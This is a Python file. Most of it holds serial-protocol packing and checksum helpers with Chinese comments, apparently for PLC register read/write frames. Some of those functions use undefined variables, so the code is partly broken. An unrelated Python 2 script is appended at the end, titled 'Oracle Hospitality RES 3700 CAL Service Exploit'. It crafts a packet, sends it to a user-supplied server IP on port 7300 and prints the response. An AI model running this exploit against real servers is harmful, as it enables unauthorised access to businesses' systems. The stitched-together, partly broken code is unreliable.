def checksum_to_ascii(self, *_each_list):
"""
参与和校验运算的字节
:param _each_list: stx之后(不包括stx),etx之前(包括etx)
:return:
"""
merge_bytes = []
for bytes in _each_list:
merge_bytes += bytes
checksum_int = Checksum8().calc(merge_bytes)
checksum_str = '{:#04X}'.format(checksum_int)
checksum_format = [ord(letter) for letter in checksum_str][2:]
return checksum_format
def __pack_check_sum(self, check_list):
"""
对传入数据进行和LRC校验
:param check_list: 需要校验的数据列表
:return: 校验和结果
"""
checksum = []
# print(check_list)
# 校验和,1 bytes。功能码、起始地址、数据和结束标识参与校验,起始标识不校验
check = Checksum8()
if check_list:
checksum_int = check.calc(check_list)
checksum_str = '{:#04X}'.format(checksum_int)
checksum = [ord(letter) for letter in checksum_str][2:]
# else:
# log.error('chencksum error')
return checksum
def pack_check_sum(func_code_, strt_addr_code_, len_code_, wt_data_code_, etx_):
checksum = []
# 校验和,1 bytes。功能码、起始地址、数据和结束标识参与校验,起始标识不校验
check = Checksum8()
if lengh_code:
chencksum = []
if operal_type == 'read':
checksum_int = check.calc(func_code_ + strt_addr_code_ + len_code_ + etx_)
checksum_str = '{:#04X}'.format(checksum_int)
checksum = [ord(letter) for letter in checksum_str][2:]
elif operal_type == 'write' and wt_data_code_:
checksum_int = check.calc(func_code_ + strt_addr_code_ + len_code_ + wt_data_code_ + etx_)
checksum_str = '{:#04X}'.format(checksum_int)
checksum = [ord(letter) for letter in checksum_str][2:]
else:
log.error('chencksum error')
return checksum
def pack_bytes(relative=6000, word_len=2, data=None, pack_type='read'):
"""
将数据组装为串口传输用数据
:param relative: D0偏移字(内部计算转换成字节数),字
:param word_len: read/write数据长度,字
:param data: 读取或写入数据,字节 写入用
:param pack_type: 操作类型:read/write
:return: 待传输字节串
"""
stx = b'\x02'
etx = b'\x03'
func_code = {'read': b'E00', 'write': b'E10'}[pack_type] # 读写功能码,3 bytes
d0_int = 0x4000 # D0协议地址
start_address = b''
if relative in range(6000, 6032):
start_address_hex = '{:#06X}'.format(relative * 2 + d0_int)
start_address = start_address_hex[-4:].encode(
'ascii') # 读写起始地址,4 bytes
lengh = b''
if word_len in range(1, 32):
len_hex = '{:#04X}'.format(word_len * 2)
lengh = len_hex[-2:].encode('ascii') # 读写长度 2 bytes
checksum = b'' # 1 bytes
check = Checksum8()
if lengh:
checksum_int = check.calc(func_code + start_address + lengh + etx)
checksum_hex = '{:#04X}'.format(checksum_int)
checksum = checksum_hex[-2:].encode('ascii')
print(stx, func_code, start_address, lengh, etx, checksum)
return stx + func_code + start_address + lengh + etx + checksum # bytes
def pack_bytes_list(_relative=6000, _word_len=1, _data=None, _read_or_write='read'):
"""
将数据组装为串口传输用数据
:param _relative: D0偏移字(内部计算转换成字节数),字
:param _word_len: read/write数据长度,字
:param _data: 读取或写入数据,字节 写入用
:param _read_or_write: 操作类型:read/write
:return: 待传输字节串
"""
stx = b'\x02'
etx = b'\x03'
# 起始标识,结束标识
func_code = {'read': b'E00', 'write': b'E10'}[_read_or_write]
# 读写功能码,3 bytes
d0_int = 0x4000
d8000_int = 0x0E00
start_address_hex = ''
start_address = b''
# 读写起始地址,4 bytes
if _relative in range(6000, 6032):
start_address_hex = '{:#06X}'.format(_relative * 2 + d0_int)
if _relative in range(8000, 8255):
start_address_hex = '{:#06X}'.format((_relative-8000) * 2 + d8000_int)
start_address = start_address_hex[-4:].encode('ascii')
lengh = b''
# 读写长度 2 bytes
if _word_len in range(1, 32):
len_hex = '{:#04X}'.format(_word_len * 2)
lengh = len_hex[-2:].encode('ascii')
checksum = b''
# 校验和,1 bytes。功能码、起始地址、数据和结束标识参与校验,起始标识不校验
check = Checksum8()
if lengh:
checksum_int = check.calc(func_code + start_address + lengh + etx)
checksum_hex = '{:#04X}'.format(checksum_int)
checksum = checksum_hex[-2:].encode('ascii')
# 写入数据长度
if func_code == 'write':
data = b'' # 格式化数据
else:
data = b''
log.info("""
the follow parameter packed:
stx: {0}:
function code: {1};
start address: {2};
data lengh: {3};
write data: {4};
etx: {5};
check sum: {6}""".format(stx, func_code, start_address, lengh, _data, etx, checksum))
# 待发送字节串list
if _read_or_write == 'read':
_bytes_list = [stx, func_code, start_address, lengh, etx, checksum]
else:
_bytes_list = [stx, func_code, start_address, lengh, data, etx, checksum]
return _bytes_list
def crccheck_checksum8(data_str):
checksum = Checksum8.calc(data_str)
return checksum
print
print 'Oracle Hospitality RES 3700 CAL Service Exploit'
print 'Using getRemoteTimeZone method/operation...'
print
TCP_IP = raw_input("Enter remote Oracle Server IP address: ")
TCP_PORT = 7300
BUFFER_SIZE = 5000
header1 = "0201"
type = "34"
header2 = "00c0a801"
unknown1 = "03"
node = binascii.hexlify("WALIDFAOR") + "00"
node_add = "0000000000000"
unknown2 = "2000000"
seq = "020101000032"
crc8_checksum = hex(Checksum8.calc(bytearray.fromhex(seq + node)) - 2)[2:]
null_terminators = "00000000000000"
MESSAGE = header1 + type + header2 + unknown1 + node + node_add + unknown2 + crc8_checksum + seq + node + null_terminators
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Sending request...'
s.connect((TCP_IP, TCP_PORT))
s.send(binascii.unhexlify(MESSAGE))
data = s.recv(BUFFER_SIZE)
s.close()
print "Received RAW data:", data